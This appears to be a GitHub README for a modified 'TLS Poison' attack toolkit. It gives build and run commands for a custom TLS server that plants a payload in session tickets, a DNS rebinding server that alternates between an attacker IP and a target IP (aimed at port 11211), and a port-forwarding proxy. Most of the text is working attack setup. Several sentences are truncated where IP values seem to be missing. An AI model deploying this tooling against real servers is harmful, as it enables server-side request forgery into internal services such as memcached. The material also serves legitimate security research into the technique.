
Primary LanguagePythonMIT LicenseMIT

TLS Poison

You can read http://blog.zeddyu.info/2021/04/20/tls-poison/ for more information.

Modified from https://github.com/jmdx/TLS-poison. Compared to the original repo, I have added some modified tools and a feature. The modified tools are shown below.

Now we can use session ticket to resume session. You could set the ticket_payload in the redis to try TLS 1.2 session ticket resumption poison.

TLS Server

# Install dependencies
sudo apt install git redis
git clone https://github.com/jmdx/TLS-poison.git
# Install rust:
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
cd TLS-poison/client-hello-poisoning/custom-tls
# There will definitely be warnings I didn't clean up :)
cargo build
# Test out the server:
target/debug/custom-tls -p 11211 --verbose --certs /root/tls/fullchain.pem --key /root/tls/privkey.pem http
# (In another terminal to verify setup)
curl -kv https://localhost:8443

If you use the proxy tool, you should change the port to 11210.

target/debug/custom-tls -p 11210 --verbose --tickets --certs /path/to/fullchain.pem --key /path/to/privkey.pem --protover 1.2 http

DNS Tool

sudo apt install python3 python3-pip
git clone https://github.com/jmdx/TLS-poison.git
cd TLS-poison/client-hello-poisoning/custom-dns
pip3 install -r requirements.txt
# $DOMAIN: The domain you own where you will set up NS records
# $TARGET_IP: Likely, though you can set this to be some box 
#   netcat listening, for early phases of testing.
# $INITIAL_IP: The IP of the box with custom-tls
sudo python3 alternate-dns.py $DOMAIN,$TARGET_IP -b -t $INITIAL_IP -d
# If you get "OSError: address already in use", you can do the following
# to stop systemd-resolved.  This might mess up lots of things outside of
# custom-dns, but if it's on a dedicated VM, you're probably okay.
# A better way is to add DNSStubListener=no to /etc/systemd/resolved.conf
sudo systemctl stop systemd-resolved
# Finally, to verify, run the following a few times to see it alternating:
dig @localhost $DOMAIN

I have changed the original dns rebinding method. It will return your TLS server IP in the first 10s, return thereafter.

If you want to change the interval time, edit client-hello-poisoning/custom-dns/alternate-dns.py#96.

return d[1] if (time() - start > 10) else args.TARGET

Proxy Tool

python2 proxy.py

Forward port 11211 to local port 11210.

New DNS Tool

python3 alternate-dns.py example.com --ip x.x.x.x --mode static_zero
     --ip 					 Your vps ip or an ip which you want the domain point to.
     --static_zero   In this mode, the tool will return two A records in a DNS query. One of the records is your vps ip, the other one is
     --rebinding		 In this mode, the tool will only return an A records in a DNS query. But it will randomly return or the ip you set. Similar like the original alternate-dns tool.